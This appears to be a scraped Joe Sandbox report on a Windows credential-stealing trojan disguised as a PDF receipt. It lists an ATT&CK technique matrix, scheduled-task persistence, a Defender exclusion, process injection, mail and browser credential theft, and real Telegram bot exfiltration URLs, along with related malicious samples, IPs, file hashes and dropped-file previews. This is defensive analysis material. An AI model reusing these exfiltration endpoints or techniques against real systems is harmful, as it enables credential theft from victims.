                  | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                  | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                  | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync1
                  File and Directory Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                  System Information Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Behavior graph (ID: 1592453; sample: rDEKONT-1_16_2025__75kb__pdf.exe; start date: 16/01/2025; architecture: WINDOWS; score: 100)

Analysis-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures.

Domains: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 2 other IPs or domains.

Process tree:

• rDEKONT-1_16_2025__75kb__pdf.exe (started)
    Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
    Dropped: C:\Users\user\AppData\Roaming\teXfNv.exe, PE32
    Dropped: C:\Users\user\...\teXfNv.exe:Zone.Identifier, ASCII
    Dropped: C:\Users\user\AppData\Local\...\tmpB0EF.tmp, XML
    Dropped: C:\...\rDEKONT-1_16_2025__75kb__pdf.exe.log, ASCII
    • powershell.exe (started)
        Signature: Loading BitLocker PowerShell Module
        • WmiPrvSE.exe (started)
        • conhost.exe (started)
    • rDEKONT-1_16_2025__75kb__pdf.exe (started)
        Network: checkip.dyndns.com 132.226.247.73, 49733, 49737, 49740 UTMEMUS United States
        Network: api.telegram.org 149.154.167.220, 443, 49764, 49775 TELEGRAMRU United Kingdom
        Network: reallyfreegeoip.org 104.21.64.1, 443, 49734, 49735 CLOUDFLARENETUS United States
    • schtasks.exe (started)
        • conhost.exe (started)
• teXfNv.exe (started)
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    • teXfNv.exe (started)
        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
    • schtasks.exe (started)
        • conhost.exe (started)

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| rDEKONT-1_16_2025__75kb__pdf.exe | 28% | Virustotal | | Browse |
| rDEKONT-1_16_2025__75kb__pdf.exe | 26% | ReversingLabs | Win32.Trojan.Sonbokli | |
| rDEKONT-1_16_2025__75kb__pdf.exe | 100% | Avira | HEUR/AGEN.1310400 | |
| rDEKONT-1_16_2025__75kb__pdf.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Roaming\teXfNv.exe | 100% | Avira | HEUR/AGEN.1310400 | |
| C:\Users\user\AppData\Roaming\teXfNv.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Roaming\teXfNv.exe | 26% | ReversingLabs | Win32.Trojan.Sonbokli | |
| C:\Users\user\AppData\Roaming\teXfNv.exe | 28% | Virustotal | | Browse |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| reallyfreegeoip.org | 104.21.64.1 | true | false | | high |
| api.telegram.org | 149.154.167.220 | true | false | | high |
| checkip.dyndns.com | 132.226.247.73 | true | false | | high |
| checkip.dyndns.org | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high |
| http://checkip.dyndns.org/ | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2012:17:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2013:16:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high |
                                                                                                                                    high
                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.64.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1592453
Start date and time: 2025-01-16 07:01:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rDEKONT-1_16_2025__75kb__pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@16/11@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 366
• Number of non-executed functions: 112
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212, 13.107.246.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
01:01:59 | API Interceptor | 8725865x Sleep call for process: rDEKONT-1_16_2025__75kb__pdf.exe modified
01:02:01 | API Interceptor | 12x Sleep call for process: powershell.exe modified
01:02:04 | API Interceptor | 6087254x Sleep call for process: teXfNv.exe modified
06:02:03 | Task Scheduler | Run new task: teXfNv path: C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        TELEGRAMRUhttp://shorten.so/fVj82Get hashmaliciousPorn ScamBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        http://hrpibzdeam.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        https://tg.666986.xyz/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        Handler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        qqnal04.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        DESCRIPTION.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        UTMEMUSWOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        330tqxXVzm.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                        • 132.224.47.164
                                                                                                                                                        QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        CLOUDFLARENETUSJHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        https://guf1.xemirax.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.21.85.129
                                                                                                                                                        MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.17.25.14
                                                                                                                                                        https://yt1s.com/en115Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.21.11.245
                                                                                                                                                        New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 104.21.32.1
                                                                                                                                                        Pedang @ P#U00ecsau.exeGet hashmaliciousBrontokBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.16.1
                                                                                                                                                        Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.32.1
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adJHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        PDF6UU0CVUO2W-YGVUIO.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0ehttp://com-evaluate-fanpage30127.pages.dev/help/contact/671203900952887Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://docusign6478.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        http://hrpibzdeam.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Drogerie-K%C3%B6rperpflege/b/?ie=UTF8&node=64187031&ref_=nav_cs_hpcGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        http://ciiscp.org/wordpress/mail.uu.se.htmlGet hashmaliciousOutlook PhishingBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://metawavetech-rho.vercel.app/gyQydv$g=JswGhjsY=LbngjTsm_Ln@vGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        http://solocyberuser.github.io/netflix/html/home.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        http://harshit-gupta-khatuji.github.io/khatuji_internGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        http://imqtokjen.com/zh.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://vanjali03.github.io/amazon/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        No context
                                                                                                                                                        Process:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1216
                                                                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1216
                                                                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2232
                                                                                                                                                        Entropy (8bit):5.380805901110357
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZMtUyus:lGLHxvCsIfA2KRHmOugras
                                                                                                                                                        MD5:F9646C8312632E8167595451BC4DFDB6
                                                                                                                                                        SHA1:B81D5807E9E9B8F7544A00F0540F8BB2AE0565E8
                                                                                                                                                        SHA-256:45D08042B8EC983CBAA45723BD6287E627218E2DF7FF55169E8FB78C0654A573
                                                                                                                                                        SHA-512:03454A3ED416D58614996AC6F2D97232F3369E5402A037AD1253535DB4B0EEA46F582A838EEC0C9AF542091FBD7AC3B3A415C92FD9661F3D6B1C409EFF7AED4E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1572
                                                                                                                                                        Entropy (8bit):5.1064332696342065
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtataxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTlv
                                                                                                                                                        MD5:20A72532580DF0A2ADAB6A6813B39ED5
                                                                                                                                                        SHA1:6B638B2E5AEE19FB562147FA007A97CC38B2ABEA
                                                                                                                                                        SHA-256:1CFD1FA3FFB0AE319E3E56C05EBE66A97B8D2F9ED2EC3353BADCE0AE5254F733
                                                                                                                                                        SHA-512:6E03CC73FD703DD6326931646C7953C6225C1421BBA282CE42132D0ABD5796F3963D81EAFCCFF5805A31B3D66A4A03F2ED7B013225655A8194000583FEF4EB4D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1572
                                                                                                                                                        Entropy (8bit):5.1064332696342065
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtataxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTlv
                                                                                                                                                        MD5:20A72532580DF0A2ADAB6A6813B39ED5
                                                                                                                                                        SHA1:6B638B2E5AEE19FB562147FA007A97CC38B2ABEA
                                                                                                                                                        SHA-256:1CFD1FA3FFB0AE319E3E56C05EBE66A97B8D2F9ED2EC3353BADCE0AE5254F733
                                                                                                                                                        SHA-512:6E03CC73FD703DD6326931646C7953C6225C1421BBA282CE42132D0ABD5796F3963D81EAFCCFF5805A31B3D66A4A03F2ED7B013225655A8194000583FEF4EB4D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                        Process:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):933888
                                                                                                                                                        Entropy (8bit):7.5993791841163345
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:7uGlcxORH/ZzPIHhHh79f1P7RTpmZl/7kcmsbY:7uOLUhrP7RTYr
                                                                                                                                                        MD5:14246EA59962956247CB757FF4C485E8
                                                                                                                                                        SHA1:41233827E40EACDC99A408D0B0ECFE78EE24120C
                                                                                                                                                        SHA-256:F89D5DB1D93B61D6E6346FA86E914A5B02E927C8EEE905E658B0818F76A545CA
                                                                                                                                                        SHA-512:8DDA3374A819F3BE57A2793094A77B663AF924268E810EB36872E1B308C3FAA0BF1DC374D26AD1CE94D6D86A5E958A8BFF4B9D647658C0D1265B378857EA1E00
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 28%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g..............0......8.......$... ...@....... ....................................@.................................p$..K....@...5........................................................................... ............... ..H............text........ ...................... ..`.rsrc....5...@...6..................@..@.reloc...............>..............@..B.................$......H...........X.......O...8...................................................t..|.x.b.P..I...L.O.}D..k.<.2..y.!....rg../....Z...,}.....W..E..m..y..{._.p...#.y..l.Y..u..}b.(.x...1.k..1V.P...w6.<4BY..y..Q..z2.fa....a..8E..X....WI..e.C...!.......;G.........fW..%*.W...8.O....x@.X...P...B.....5.[.$.<%X...'.tJ.YF...E.{.`A%S.FLN{7......T.*-.y1...y.rJZ.[Ip....2y//..8(*..I....K.0..n{.L(...H..-.....<.F. . .r.<.q.#8.B............D.........cT~..y.}a9x...e;...b).s.".^}q8.4..
                                                                                                                                                        Process:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26
                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                        Encrypted:false
